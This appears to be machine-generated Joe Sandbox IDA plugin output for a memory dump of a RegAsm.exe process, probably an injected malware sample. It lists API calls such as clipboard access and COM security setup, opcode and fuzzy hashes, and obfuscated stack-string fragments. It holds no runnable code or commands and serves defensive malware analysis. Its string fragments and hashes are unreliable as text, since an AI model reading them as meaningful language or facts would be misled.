                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlanketProxy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3890896728-0
                                                                                                        • Opcode ID: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
                                                                                                        • Instruction ID: 88ab58616cf1dac6cba617d780c76543ffdeb80aa514c7c7d0db7b6f6353d972
                                                                                                        • Opcode Fuzzy Hash: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
                                                                                                        • Instruction Fuzzy Hash: 0FF09EB8509342CFD394DF64C5A875BBBE0EB89348F01891CE4998B391DBB59548CF82
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlanketProxy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3890896728-0
                                                                                                        • Opcode ID: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
                                                                                                        • Instruction ID: d25a5440729caa6a4a41176679ca809818bf9cac461bb09e9bc77660d505e8e6
                                                                                                        • Opcode Fuzzy Hash: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
                                                                                                        • Instruction Fuzzy Hash: 56F0D4B45093019FD314DF29D16871ABBF4FB88304F01991CE49ACB790C7B5AA48CF82
                                                                                                        APIs
                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                        • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                        • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                        • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79
                                                                                                        APIs
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeSecurity
                                                                                                        • String ID:
                                                                                                        • API String ID: 640775948-0
                                                                                                        • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                        • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                        • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                        • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                        • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                        • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                        • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                        • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                                                        • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                        • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                        • API String ID: 0-561599860
                                                                                                        • Opcode ID: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
                                                                                                        • Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
                                                                                                        • Opcode Fuzzy Hash: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
                                                                                                        • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                        • API String ID: 0-168325148
                                                                                                        • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                        • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                                                                                        • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                        • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                        • API String ID: 0-3492884535
                                                                                                        • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                        • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                        • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                        • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                        • API String ID: 0-2608794092
                                                                                                        • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                        • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                        • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                        • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                        • API String ID: 0-1300133108
                                                                                                        • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                        • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                                                                                        • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                        • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                        • API String ID: 0-1893782281
                                                                                                        • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                        • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                                                                                        • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                        • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                        • API String ID: 0-1290103930
                                                                                                        • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                        • Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
                                                                                                        • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                        • Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                                                        • API String ID: 0-1826372655
                                                                                                        • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                        • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                                        • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                        • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                                        APIs
                                                                                                          • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                        • String ID: / $/,-$46
                                                                                                        • API String ID: 764372645-479303636
                                                                                                        • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                        • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                                        • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                        • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                        • API String ID: 0-2463461626
                                                                                                        • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                        • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                        • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                        • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                                                                                        • API String ID: 0-2986092683
                                                                                                        • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                        • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
                                                                                                        • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                        • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1006321803-0
                                                                                                        • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                        • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                        • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                        • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                        • API String ID: 0-2309992716
                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                        • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                        • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: )G+I$+K M$B~B$|B$s0u
                                                                                                        • API String ID: 0-2670551875
                                                                                                        • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                        • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                                                                                        • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                        • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                        • API String ID: 0-909542228
                                                                                                        • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                        • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                                                        • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                        • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                        • API String ID: 0-909542228
                                                                                                        • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                        • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                        • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                        • API String ID: 0-909542228
                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                        • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                        • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                        • API String ID: 0-909542228
                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                        • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                        • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: ,$i$r}A
                                                                                                        • API String ID: 2994545307-2114006112
                                                                                                        • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                        • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                        • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                        • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: gfff$i$r}A
                                                                                                        • API String ID: 0-3931832132
                                                                                                        • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                        • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                        • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                        • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <pr$st$y./
                                                                                                        • API String ID: 0-3839595785
                                                                                                        • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                        • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                                                                                        • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                        • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 34$C]$|F
                                                                                                        • API String ID: 0-2804560523
                                                                                                        • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                        • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                        • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                        • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #XXL$=$BC
                                                                                                        • API String ID: 0-2546488661
                                                                                                        • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                        • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                                                                                        • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                        • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
